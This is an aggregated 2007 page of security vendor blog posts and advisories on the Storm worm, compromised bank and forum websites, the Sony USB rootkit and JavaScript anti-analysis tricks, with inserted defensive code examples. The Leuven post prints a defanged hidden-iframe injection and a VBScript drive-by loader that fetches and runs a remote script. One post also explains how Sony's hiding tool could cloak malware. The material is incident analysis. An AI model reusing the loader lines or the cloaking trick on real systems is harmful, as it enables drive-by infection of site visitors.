August 2007 - Posts

 

Nuwar/Zhelatin/Storm took a nap

Friday August 31, 2007 at 7:16 am CST
Posted by Dirk Kollberg


While monitoring the Nuwar/Zhelatin/Storm network, I noticed the bot stopped sending out emails on Thursday at 9.45pm UTC.

No more postcards? No more Pump&Dump spam? Or just a bug in my setup?

This morning at 7.00am UTC, still not a single mail. But I saw the bot connecting to the Peer-to-Peer network and transferring data - the same way it used to do the last several days.

I gave MessageLabs a call and they confirmed that the number of intercepted emails containing Nuwar related links had diminished considerably in the past few hours.

So it’s not my goat setup behaving differently than expected.

Time to party? Unfortunately not - at 10.45am UTC, my system sent me an alert. New mails got captured. Well, at least it took a nap for 13 hours.

Watch out for mails offering videos from either:

Snoop Dog, Beyonce, Hurricane Chris, Emenem, Lil Mama, Heuy, Chris Brown, Eagles, T-Pain, Fergie, R. Kelly, Sean Kingston, Kelly Clarkson, Velvet Revolver, Fat Boy, Akon, Rihanna, Foo Fighters.

For example:

Zhelatin example

Source: Computer Security Research - McAfee Avert Labs Blog

 

Compromised Bank Of India Website!

Friday August 31, 2007 at 3:30 am CST
Posted by Nitin Jyoti


Our friends from Sunbelt reported the Bank of India website as seriously compromised late last night. The main page of this website had a hidden IFRAME linking to a malicious website hosting multiple exploits. An unsuspecting visitor will end up getting infected if their system is not fully patched.

At McAfee Avert Labs, we come across defacements of Indian websites on a regular basis. This is only the second high-profile incident where a popular Indian website was compromised to serve malware. In a prior incident, the website of the national air carrier, Air India, was compromised to host malware.

Following is a pictorial representation of how the Bank of India website was found to be linked to malicious sites, this morning (Indian time).

Bank Of India Infection

McAfee protects its customers against this threat via script scan. You can read more about this on one of our earlier blogs here. The obfuscated scripts that attempt to exploit users' machines are blocked from execution, thereby nullifying the attack. The script used in this attack was proactively detected as JS/Downloader-AUD.

Following are some of the malware we saw getting downloaded at the time of writing this blog (Credits to Prashanth PR for analysis).

Update: We made contact with the Bank officials and intimated them about the situation. The site has been cleaned up now :-)

Source: Computer Security Research - McAfee Avert Labs Blog

 

Published: 2007-08-30,
Last Updated: 2007-08-31 06:22:54 UTC
by Mark Hofman (Version: 1)

Some of you will have noticed some Vista patches coming through today.

It looks like there are 5 patches, 2 important, 2 recommended and one optional.

 

 

Patch - Description - Rating - Date

KB933360 - Daylight Saving Time changes - Important - 28/8/07

KB939159 - Resolves an issue in the Background Intelligent Transfer Service (BITS) - Important - 28/8/07

KB938194 - Resolves some compatibility and reliability issues in Windows Vista - Recommended - Today (30/8)

KB938979 - Resolves some performance and reliability issues in Windows Vista - Recommended - 25/8/07

AMD Patch for ATI - Potential vulnerability in the CATALYST installer component - Optional - 25/8/07

NOTE: Readers are reporting that the AMD patch also applies to XP, as does 933360.

A reboot is also required, but then it would be unusual if it weren't.

A reader (thanks Dan) also mentioned this link, http://support.microsoft.com/kb/894199/en-us, which seems to be a good synopsis of the patches deployed. Might be a good spot to check Patch Tuesday stuff.

 

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Sony is awake
Posted by Mikko @ 11:04 GMT


Sony Electronics phoned us today. They wanted to thank us for bringing the Microvault incident to their attention, and they also wanted to apologize for not responding to our earlier queries regarding the incident.
We have now opened direct discussion channels with Sony Electronics and are assisting them with the investigation. We have also provided them with our internal investigation notes on the case.
We were also promised a direct contact point for the future. Just in case we would again discover a rootkit or something in Sony's products. After all, we have already done it twice...

Source: F-Secure : News from the Lab

 

Bioshock rootkit rumor shot down

The recent release of the eagerly anticipated Bioshock game led to gamers getting another kind of shock. Bioshock is a hybrid first-person shooter/RPG from Irrational Games. A rumor had circulated that the Bioshock game comes loaded with a rootkit. After investigation, Symantec can confirm that this is not true.

The rumor seems to have started after Microsoft’s RootkitRevealer found a “SecuROM” registry setting that it found suspicious after the Bioshock game had been installed. SecuROM just so happens to be owned by Sony who after all had started the whole rootkit outrage with their music CDs.

The SecuROM installation creates a folder and a registry key with a null character, which prevents users from accessing or deleting the key from the registry. This is to assist with disc authentication and anti-piracy measures. It is, however, not a rootkit.

Posted by Peter Coogan on August 31, 2007 05:00 AM

Source: Symantec Security Response Weblog: Bioshock rootkit rumor shot down

 

Bank of India's website compromised
Posted by Patrik @ 05:40 GMT


Earlier today we saw a blog post from our friends over at Sunbelt about a compromise of Bank of India's website and we checked it out.

Bank of India

On the front page of the site a hidden iframe has indeed been inserted and it loads a URL from another website.

Bank of India iframe

This file in turn uses three iframes to load three other URLs.

Bank of India iframe

Two of the URLs are now down, but the third one contains an obfuscated JavaScript that uses exploits to download and run a file called 'loader.exe'. This file is a small downloader which fetches additional files: various password-stealing trojans, additional downloaders, etc. We detect all of the malicious files with the latest update.

Update: The malicious iframe has been removed from the front page and it's now safe to visit the site again.
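The pattern described here (an injected zero-size iframe on the front page, chaining to further iframes and an obfuscated script) is the same one seen in the Bank of India, The Bill and Leuven forum posts collected on this page. The following is an added example, not F-Secure's code, of a minimal static check a site owner could run over their own HTML to spot that kind of injection; the sample page and the hosts in it are constructed placeholders, not the ones from the incident.

```javascript
// Added example, not code from F-Secure or from the other posts on this page: a small
// static scanner for the injection pattern described here (a zero-size or hidden
// iframe, and a script tag pulling from a third-party host). The HTML below is
// constructed; the hostnames are placeholders, not the ones from the incident.

// Parse one tag's attribute string into a map keyed by lowercase attribute name.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([a-zA-Z_:][-\w:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Hostname of an absolute URL, or null for a relative (same-origin) reference.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Heuristics for an iframe that is meant not to be seen by the visitor.
function looksHidden(attrs) {
  const zero = (v) => v !== undefined && /^0(px)?$/.test(String(v).trim());
  const style = (attrs.style || "").toLowerCase();
  return (
    (zero(attrs.width) && zero(attrs.height)) ||
    /display\s*:\s*none/.test(style) ||
    /visibility\s*:\s*hidden/.test(style)
  );
}

// Scan raw HTML and return findings for hidden iframes and off-site scripts.
// Regex tag matching is deliberately simple: it will not see tags assembled at
// run time (e.g. via document.write), which is the usual limit of static scanning.
function scanHtml(html, siteHost) {
  const findings = [];
  const tagRe = /<(iframe|script)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    const host = hostOf(attrs.src || "");
    const offSite = host !== null && host !== siteHost.toLowerCase();
    if (tag === "iframe" && looksHidden(attrs)) {
      findings.push({ kind: "hidden-iframe", src: attrs.src || "", offSite });
    } else if (tag === "script" && offSite) {
      findings.push({ kind: "offsite-script", src: attrs.src, offSite });
    }
  }
  return findings;
}

// Constructed page: legitimate content plus two injected tags on placeholder hosts.
const SAMPLE_HTML = `
<html><body>
<h1>Welcome</h1>
<script src="/js/menu.js"></script>
<iframe src="https://evil.example.invalid/x.htm" width="0" height="0"></iframe>
<script src="http://cdn.example.invalid/t.js"></script>
<iframe src="/ads/banner.htm" width="300" height="250"></iframe>
</body></html>`;

const findings = scanHtml(SAMPLE_HTML, "bank.example.invalid");
for (const f of findings) console.log(f.kind, f.src);
```

The scan flags the 0x0 iframe and the script fetched from a host other than the site's own; the same-origin menu script and the normally sized banner iframe pass. Run over a saved copy of the front page on a schedule, a diff of these findings against a known-good baseline is a cheap early warning for the kind of silent modification all of these posts describe.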

Source: F-Secure : News from the Lab

 

Analyst's Diary

Active anti-reverse techniques in Javascript

VitalyK
August 31, 2007 | 08:51  GMT


We recently came across a very interesting suspicious web page. The HTML page of course contained malicious code that linked to the Trojan. However, it was a separate HTML page inside the benign one - the authors of the code went against HTML standards, and put in an extra <html></html> container.

What's surprising is that browsers (we checked using Internet Explorer, Firefox and Opera) don't have any problem processing a page like this. On the other hand, who would expect malicious users to observe standards?

However, this isn't the main issue. We're interested in the script that the malicious users integrated into the web page. Of course, the script is designed to make analysis as difficult as possible, using techniques to obfuscate the JavaScript.

The script itself looks more or less like this:

Nothing particularly surprising here - the majority of scripts like this can be decrypted without analysing all the steps taken to manipulate the code. You just have to find the part of the code which prints to the original web page in order to run the payload. And in this case it's the document.write() function:

If we modify this, we can see the decrypted code for the payload. Change document.write(P7E87DE2) to textarea1.innerHTML=P7E87DE2, with textarea1 being the HTML textarea container on the copy of the infected page that we deliberately created on a local hard drive. Now we can see what the script does in the textarea field. Which gives us the following:

And it seems that this script doesn't print anything. This is the first impression - but a closer look at the script turns up this string:

What does this mean? It's very simple - this function gets its own code, and transforms it into a 'key' text string which is made up of letters and numbers. Within the function this string is used to generate the payload i.e. what gets entered in the text area depends on the body of the function itself!

As a consequence, if the code is modified in the slightest way, the result generated will be completely different, and may be completely nonsensical - this is what happened on our first attempt. It's a sort of defense mechanism against modifying the body of the JavaScript function. I haven't seen anything like this before in JavaScript - it's pretty smart.

However, it's possible to get round all of this simply by getting the same string from outside the function, assigning the variable q2854da60, which should be contained in the key string, to the result.

If you're an analyst doing this, and you're trying to get the script from inside the encrypted code, then you might suddenly find that when you open a correctly crafted page in order to get the hidden contents of the script, the browser will freeze. I'll just stick my two cents in here, and point out that this is the moment when your computer will get infected.

The construction that an analyst ends up with inside the <textarea></textarea> tags is crafted in such a way as to infect not only users' machines, but also the computer of an analyst who's trying to get to the payload code by printing it to the textarea! The construction looks like this:

So if the code is placed inside the textarea container, the code will close the textarea tag and add an iframe container - the browser uses this to load an external script which contains the exploit Trojan that infects the system.
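As an added illustration (not the script from the page, whose payload is live malware), the following Node.js snippet reconstructs the two tricks described above with a benign payload: a decoder that derives its key from its own source text through Function.prototype.toString, and decoded output that contains a closing </textarea>. The hash, the key length and the payload are constructed for the demo; "document" is a stand-in object, and hooking it is the analyst-side technique the post alludes to (capture the sink without editing the function).

```javascript
// Added example (not the script from the page): a benign reconstruction of the
// self-keyed decoder the post describes, an analysis harness that captures its
// output without touching the function body, and the escaping needed before the
// captured text is shown inside a <textarea>. Runs under Node; "document" is a
// constructed stand-in for the browser object.

// Deterministic 32-bit hash (FNV-1a style, constructed for the demo) of a function's
// exact source text, rendered as 8 hex digits and used as a repeating XOR key.
function keyFor(fn) {
  const src = fn.toString(); // exact source, comments and whitespace included
  let h = 2166136261;
  for (let i = 0; i < src.length; i++) {
    h = Math.imul(h ^ src.charCodeAt(i), 16777619) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

// Symmetric XOR with a repeating key: the same call encrypts and decrypts.
function xorWith(text, key) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(text.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// The self-keyed decoder: its key is derived from this very function's source, so
// any edit to the body, even to a comment, yields a different key and garbage output.
const decoder = function self(cipher) {
  // key comes from this function's own source text
  const out = xorWith(cipher, keyFor(self));
  document.write(out); // the sink an analyst is tempted to edit
  return out;
};

// The analyst's "harmless" edit from the post: document.write() taken out.
// The source text now differs, so the derived key differs too.
const editedDecoder = function self(cipher) {
  // key comes from this function's own source text
  const out = xorWith(cipher, keyFor(self));
  return out; // document.write() removed
};

// Benign constructed payload standing in for the real one. It deliberately contains
// a closing </textarea> tag, which is the second trick the post describes.
const PAYLOAD = "console.log('decoded'); /* </textarea><b>now outside the box</b> */";
const CIPHER = xorWith(PAYLOAD, keyFor(decoder)); // what such a page would ship

// Analysis harness: hook the sink instead of editing the function. In a browser the
// equivalent is overriding document.write before the hostile script runs.
const captured = [];
globalThis.document = { write: (s) => captured.push(s) };

// Run the untouched decoder and return what it tried to write to the page.
function extractPayload() {
  captured.length = 0;
  decoder(CIPHER);
  return captured[0];
}

// Run the edited copy: the key no longer matches, so the output is not the payload.
function extractWithEditedDecoder() {
  return editedDecoder(CIPHER);
}

// Escape captured text before placing it in the page via innerHTML; otherwise a
// "</textarea>" inside the payload closes the box and the rest is parsed as markup.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function breaksOutOfTextarea(s) {
  return /<\/textarea/i.test(s);
}

console.log("untouched decoder :", JSON.stringify(extractPayload()));
console.log("edited decoder    :", JSON.stringify(extractWithEditedDecoder()));
console.log("safe to display   :", escapeHtml(extractPayload()));
```

Running the untouched decoder through the hooked document.write yields the payload exactly, while the copy with document.write removed derives a different key and produces garbage, which is the first failed attempt the post describes. escapeHtml shows the fix for the second trap: text placed in a textarea via innerHTML must be escaped (or assigned through a text node), or a </textarea> in the payload ends the box and whatever follows is rendered as live markup.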

This example shows very clearly how virus writers are combating antivirus professionals who want to protect rank and file users. And if a virus analyst makes the smallest error, his or her machine will become infected. And that's one of the reasons that I love my job - because it teaches me that there's no room for error!

Source: Viruslist.com - Analyst's Diary

 

Nuwar moonlights as a blogger

Thursday August 30, 2007 at 2:55 pm CST
Posted by Allysa Myers


It used to be one of our many mantras, back in the old days, that virus writers do not have QA departments. That is to say, virus infections can cause very odd, unintended consequences.

How many of you out there remember the Bugbear virus from 2002? It had a very odd side effect that it would send its attachments to network printers, causing them to spew tons of pages of apparent gibberish, as it printed out the contents of its executable attachment.

Nuwar is having a similarly strange effect lately, effectively posting itself to blogs, where people have set their blogs to be updated by email. Kind of a bonus spreading mechanism there, as this doesn’t seem to have been intentional.

At this point the social engineering doesn’t translate very well, as it’s really geared towards the email format. It should stick out pretty distinctly on a person’s blog. Of course the usual advice applies… don’t go clicking on strange links. kthx!!!

Source: Computer Security Research - McAfee Avert Labs Blog

I got a call from the Managing Editor of WindowsSecrets.com last night, letting me know that he had decided to discontinue my column effective immediately. He plans to have one of the other editors combine the same kind of content into their columns. My last column was published on August 16th, 2007.

I can't say that I am surprised, but it couldn't have happened at a better time. That small column was beginning to demand more time than it was supposed to when I first signed up for it, and with the book deadlines coming up, it would have been impossible to keep up.

Working for that newsletter was a great opportunity for me, and I enjoyed working with the other editors as they were real professionals and very passionate about what they do.

I wish them all the best in the future.

 

More Nuwar Woes!

Wednesday August 29, 2007 at 7:03 am CST
Posted by Vinoo Thomas


The Nuwar gang are up to no good again. So far we’ve seen a dizzying flurry of malicious ecards, sexy emails, membership themes and YouTube bait over the last couple of weeks from the authors of the Storm worm. The latest spam run calls for beta testers to try out a product in exchange for lifetime free updates. A sample mail is as follows:

Copy of spammed e-mail

What the unsuspecting user gets in return upon downloading and executing “setup.exe” is more than what they had hoped for! - A copy of the W32/Nuwar worm.

The newest spam run uses plain text instead of HTML-formatted emails, and the IP addresses listed appear to be re-used across different spam runs. If one traverses to the root of the listed URL, http://75.70.[Removed].232, one ends up at a page showing a YouTube image (Nuwar’s spam theme over the weekend) requesting that the user manually download and execute “video.exe”. More alarmingly, a Google search for any of the subject lines used in the Nuwar YouTube spam run turns up legitimate blog sites that appear to be infected with links pointing to a copy of the worm. More on this at SunBelt’s blog.

Sadly the authors of Nuwar can afford to experiment at will, because if an experiment were to fail, the worst that can happen is that one of their spam runs would not be that successful. And these spammers get instant feedback on how successful a spam run was because people continue to click on the bait links. As a result of this user feedback they continue to develop more effective social engineering techniques and improve upon their creations.

Even if your computer is fully patched and running up-to-date antivirus and firewall software, it still does not stand a chance against social engineering when a user invites the threat in, especially since malware can be tweaked and tested until it stays undetected by an antivirus product. McAfee Avert Labs expects the spammers to continue using these types of tactics, and it will be imperative that users are educated on how to avoid becoming a victim.

Source: Computer Security Research - McAfee Avert Labs Blog

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 29, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-047 - Important
* MS07-046 - Critical
* MS07-045 - Critical
* MS07-044 - Critical

Bulletin Information:
=====================

* MS07-047 - Important

- http://www.microsoft.com/technet/security/bulletin/ms07-047.mspx
- Reason for Revision: V1.1 (August 29, 2007): Bulletin revised to correct Registry Key Verification for Windows Media Player 7.1, 9, 10, and 11 on supported editions of Windows 2000 Service Pack 4, Windows Server 2003 Service Pack 1, Windows Server 2003 Service Pack 2, Windows XP Service Pack 2 and x64 Editions.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Important
- Version: 1.1

* MS07-046 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx
- Reason for Revision: Bulletin Updated: Additional information has been added to include workarounds for this vulnerability.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1

* MS07-045 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
- Reason for Revision: Revised to document the functionality change of increasing the limit on cookies from 20 to 50.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2

* MS07-044 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-044.mspx
- Reason for Revision: Bulletin updated to change download link display text for Office components in Affected Software table
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1

 

August 29, 2007

Malicious Web site / Malicious Code: The Bill site compromise


Websense® Security Labs™ has discovered that the official Web site of The Bill, a popular British TV series, has been compromised and laden with malicious JavaScript code meant to infect visitors with a Trojan horse. Fortunately, the malicious code failed to launch, due to what appears to be sloppy work by the intruder: the code meant to execute was placed in the wrong section of the Web site.

We believe that these are the same perpetrators behind three similar compromises of a UN web site, a prominent bank in India and a large industry organization Web site. Websense Security Labs discovered and reported on these incidents earlier.

At this time, the malicious code is still on the Web site. However, Websense users with Websense Web Security Suite are protected from connecting to the sites hosting the malicious payload.

Screenshot of the Web site with its HTML source:

Source: Websense® - Security Labs Alert: The Bill site compromise

 

Sony's USB Rootkit vs Sony's Music Rootkit
Posted by Mikko @ 14:45 GMT


Monday's post disclosed our investigation of Sony's MicroVault USM-F fingerprint reader software. Sony's software installs a driver that creates a hidden folder using rootkit techniques.
Spot the Van Zant Sony BMG music rootkit in the background!
This raises the question – while the techniques employed are similar – is this case as bad as the Sony BMG XCP DRM case (i.e. the music rootkit)?
In a nutshell, the USB case is not as bad as the XCP DRM case. Why? Because…
The user understands that he is installing software, it's on the included CD, and has a standard method of uninstalling that software.
The fingerprint driver does not hide its folder as "deeply" as does the XCP DRM folder. The MicroVault software probably wouldn't hide malware as effectively from (some) real-time antivirus scanners.
The Microvault software does not hide processes or registry keys. XCP DRM did.
It's also trickier to run executables from the hidden directory than with XCP. However, it can be done.
And lastly, there seems to be a use-case: The cloaking is most likely used to protect fingerprint authentication from tampering. Sony is attempting to protect the user's own data. In the DRM case, Sony was attempting to restrict you – the user – from accessing the music on the CD you bought. So their intent was more beneficial to the consumer in this case.
However – this new rootkit (which can still be downloaded from sony.net) can be used by any malware author to hide any folder. We didn't want to go into the details about this in our public postings, but we suppose the cat's out of the bag now that our friends at McAfee blogged about this yesterday. If you simply extract one executable from the package and include it with malware, it will hide that malware's folder, no questions asked.
We still haven't received any kind of response from Sony International. Sony Sweden did however confirm in a public IDG story that the rootkit is indeed part of their software.

Source: F-Secure : News from the Lab

 

Analyst's Diary

Botnet losing ground

VitalyK
August 29, 2007 | 13:44  GMT


Over the last couple of weeks we've been closely following the behaviour of a botnet with a C&C (command and control) center based on a popular web-based engine.

We waited for it to grow (see previous posts) and it was interesting to see the increase in the number of infected machines. And now the scale of the botnet is shrinking.

Today the botnet was made up of 6000 zombies, even though a week and a half ago there were more than 14 000! What happened? We took a look and found that there's a significant difference between the total number of infections and actual number of infected machines.

Let's take a look at the zombie network stats that we got today:

Subtract "GENERAL NUMBER BOTS" from "GENERAL NUMBER OF INFECTIONS" and there's a difference of about 10 000. This means the botnet is losing its bots!

Now let's compare the very same stats with the ones that we captured while the botnet was still growing:

The difference between "GENERAL NUMBER OF INFECTIONS" and "GENERAL NUMBER BOTS" is less than 500!

These differences are explained by the fact that AV companies have been busy detecting malicious files which were used to create the botnet. The time taken before all AV vendors detected the files was several days. During this time bots were detected and removed from PCs and this is why the botnet is losing its clients. And every day, as more and more users update their AV databases the botnet continues to lose ground...

Source: Viruslist.com - Analyst's Diary

 

Hide me Sony one more time!


File this one under “Déjà vu all over again”. After learning from F-Secure of shady rootkit-like activities noticed in the software packaged with several Sony USB drives, we were first a bit amazed. After all that had occurred with the audio CD episode, could this really be true? Well, it was.

In the class of nasty rootkits the ones that top the chart are those that use blended techniques to hide or protect themselves. I/O request packet filtering is one kernel mode rootkit technique that is gaining popularity along with the already common SDT hooking.

Sony’s MicroVault USB media ‘Fingerprint Access’ software uses programs and device drivers developed by Fineart Technology Co. Ltd. The Fineart device driver installs as a file-system filter driver on top of the existing driver stack. It also hooks the Service Descriptor Table in order to hook NtEnumerateKey. Once this is established, all file system information is filtered through this new device driver, so it can easily hide any directory or file. Following is a snapshot of WinDbg showing the device stack.

Windbg snapshot
Figure 1 - \Driver\FG adds itself on top of the driver stack for file system IO.

The apparent intent was to cloak sensitive files related to the fingerprint verification feature included on the USB drives. However, in this case (*cough* AGAIN! *cough*) the authors apparently did not keep the security implications in mind. The executable can be placed in potentially any directory and when executed will subsequently hide all the folders and files within that directory!

As a test we placed the binary in %windir%. Upon launch, all the files and subdirectories, including system32, were indeed hidden. None of the resources within the directories were accessible anymore. We could no longer run simple utilities like ‘regedit’, ‘notepad’ or ‘cmd’ from the Run dialog box in the Start menu, as the path was not resolved due to the cloaking; one could, however, still access the files using fully qualified paths. Fortunately the executable by itself does not add an entry to the registry Run key or establish any other startup method, so the hidden objects are accessible again upon reboot. However, the device driver component is loaded into memory after reboot, so at that stage it is a simple matter of re-executing the binary to hide directories and files again.

The publisher may argue that the default installation path is %windir%\[some directory], but that does nothing to stop malware authors from copying the binary to an arbitrary directory of their choice and executing it in that location. Alternately they could simply hide their malicious creations in the default installation directory itself. Another easy hack for malware authors would be to launch the binary from their chosen directory and add a startup entry for the software to ensure it is hidden immediately on boot-up.

Here is the snapshot of VirusScan in action. VirusScan detects the device driver as HideVault!sys and removes it to disable any potential cloaking upon reboot.

VirusScan in Action

Sadly, it appears that expediency of function has again trumped forethought of consequences in one of Sony’s creations.

Source: Computer Security Research - McAfee Avert Labs Blog

 

ATI’s penicillin to PurplePill and the PatchGuard patch that wasn’t

Here is a short update to bring this latest chapter in Vista’s security fairytale finally to a close.

On Monday the 13th of August, ATI patched their Catalyst drivers to resolve the vulnerability that PurplePill exploited. ATI should be commended for the speed and agility with which they responded to the issue, although one has to wonder if Microsoft had a hand in this.

It’s still not clear how they are going to deal with the distribution of this update (there's some conjecture around using Windows Update) and revocation of the old driver. Patching it is one thing, but they can’t leave the old driver floating around indefinitely - or can they? So anyway, along with Patch Tuesday came an update to PatchGuard; it’s not clear what extra “resilience” is added in this driver, but could this be designed to complicate exploiting vulnerabilities such as those in the ATI driver? Well, it’s not clear currently – it would be logical for Microsoft to continually update PatchGuard to obfuscate, misdirect and complicate exploitation by protecting more key kernel structures while adjusting how the kernel implements PatchGuard protection.

So, with the ATI vulnerability closed and Microsoft’s recent improvements to PatchGuard - which seems slightly confused on whether it’s a security update or not - we’ll have to wait for the next driver vulnerability to be found. Plus, while we’re discussing the PatchGuard patch, why doesn’t Microsoft consider that it addresses a security vulnerability? Well, if we look at the advisory we can see they state:

“While this update adds additional checks to the Kernel Patch Protection system, it does not involve a security vulnerability. Known methods that allow the kernel to be patched on systems where Kernel Patch Protection is enabled require a system to already be compromised by an attacker.”

Alright then! But improvements are good and, well, making PatchGuard harder to subvert is always a good thing.

Until next time…

Posted by Ollie Whitehouse on August 24, 2007 12:24 PM

Source: Symantec Security Response Weblog: ATI’s penicillin to PurplePill and the PatchGuard patch that wasn’t

 

VMWare Workstation vstor-ws60.sys Denial of Service

Secunia Advisory:
SA26606

Release Date:
2007-08-28

Critical:

Not critical

Impact:
DoS

Where:
Local system

Solution Status:
Unpatched

Software:
VMware Workstation 6.x

Description:
seppi has reported a vulnerability in VMWare Workstation, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

The vulnerability is caused due to the improper validation of userspace parameters within the "FsSetVolumeInformation" IOCTL handler in vstor-ws60.sys. This can be exploited to crash the vulnerable system by sending a "FsSetVolumeInformation" IOCTL with a subcode equal to "FsSetFileInformation", containing an invalid, small size for the file buffer (1024 bytes under the actual size).

The vulnerability is reported in version 6.0. Other versions may also be affected.

NOTE: A crash is confirmed in the "vstor2-ws60.sys" driver from VMWare Workstation version 6.0 while performing standard "DC2" tests.

Solution:
Restrict access to trusted users only.

Provided and/or discovered by:
seppi


Source: VMWare Workstation vstor-ws60.sys Denial of Service - Advisories - Secunia

 

Published: 2007-08-28,
Last Updated: 2007-08-28 10:18:07 UTC
by Maarten Van Horenbeeck (Version: 2)

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as successful as we'd hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may feel like filtering the malicious URL mentioned.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www xvgaoke.cn /ms/ltxs.js
 
This Javascript routes you to another page using a hidden iframe:
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
 
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
 
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
Function decode(x)
For i = 1 To Len(x) Step 4
If Mid(x, i, 4) = "0D0A" Then
decode = decode & vbCrLf
Else
decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
End If
Next
End Function
execute (decode(abc))
execute (decode(cde))
 

Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a .vbs file and executed. However, that's not what we want to do here, since the script says EXECUTE. Not a good idea.

So, let's change these commands around a bit. Wscript contains a function that allows you to echo content to the screen in a message box:

wscript.echo (decode(abc))
wscript.echo (decode(cde))
 
Executing the script through wscript then results in some more VBScript which includes the following code:
 
on error resume next
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
 
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access component (MDAC). On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control part of the ActiveX Data Objects (ADO), referenced in the exploit code above. Today still, this vulnerability is commonly exploited as part of so-called drive by exploits.
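For the decode step, here is an added example (not the ISC handler's own code) that does statically, in Node.js, what the page's VBScript decode() does, so that the inner script can be read and triaged without ever reaching an Execute call. The sample hex string is constructed from a benign fragment; the indicator list is assembled from what the post names (the MDAC CLSID, object creation, XMLHTTP and shell execution) and is not a vendor signature.

```javascript
// Added example, not the handler's own code: a static decoder for the 4-hex-digit
// strings the page's VBScript hands to Execute, mirroring its decode() routine but
// never executing anything, plus a triage pass for the indicators the post names.
// The sample input is constructed here; the real strings are not reproduced.

// One group of four hex digits is one UTF-16 code unit (VBScript's Chr(Int("&H" & group)));
// the page's decode() special-cases the literal group "0D0A" as CR LF.
function decodeHex4(x) {
  let out = "";
  for (let i = 0; i + 4 <= x.length; i += 4) {
    const group = x.slice(i, i + 4);
    if (group.toUpperCase() === "0D0A") {
      out += "\r\n";
    } else {
      out += String.fromCharCode(parseInt(group, 16));
    }
  }
  return out;
}

// Inverse of decodeHex4, used only to build the sample below.
function encodeHex4(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    out += text.charCodeAt(i).toString(16).toUpperCase().padStart(4, "0");
  }
  return out;
}

// Indicators taken from the decoded script shown in the post. Constructed triage
// list for illustration, not a vendor signature.
const INDICATORS = [
  { name: "MDAC CLSID named in the post", re: /BD96C556-65A3-11D0-983A-00C04FC29E36/i },
  { name: "CreateObject call", re: /createobject\s*\(/i },
  { name: "Microsoft.XMLHTTP", re: /Microsoft\.XMLHTTP/i },
  { name: "Shell.Application / ShellExecute", re: /Shell\.Application|ShellExecute/i },
  { name: "nested Execute", re: /\bexecute\s*\(/i },
  { name: "on error resume next", re: /on\s+error\s+resume\s+next/i },
];

// Names of the indicators present in decoded text, in list order.
function triage(decoded) {
  return INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
}

// Constructed stand-in for the page's "abc" string: a fragment that only assigns
// variables (no URL, no download, no execution), encoded the same way, with one
// compact "0D0A" group appended to exercise the special case.
const SAMPLE_VBS =
  'on error resume next\r\n' +
  'm3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"\r\n' +
  'm4="Microsoft.XMLHTTP"\r\n' +
  'm5="Shell.Application"';
const SAMPLE_HEX = encodeHex4(SAMPLE_VBS) + "0D0A";

// Decode and triage in one step, as an analyst would, with no Execute anywhere.
function analyse(hex) {
  const decoded = decodeHex4(hex);
  return { decoded, indicators: triage(decoded) };
}

const result = analyse(SAMPLE_HEX);
console.log(result.decoded);
console.log("indicators:", result.indicators.join(", "));
```

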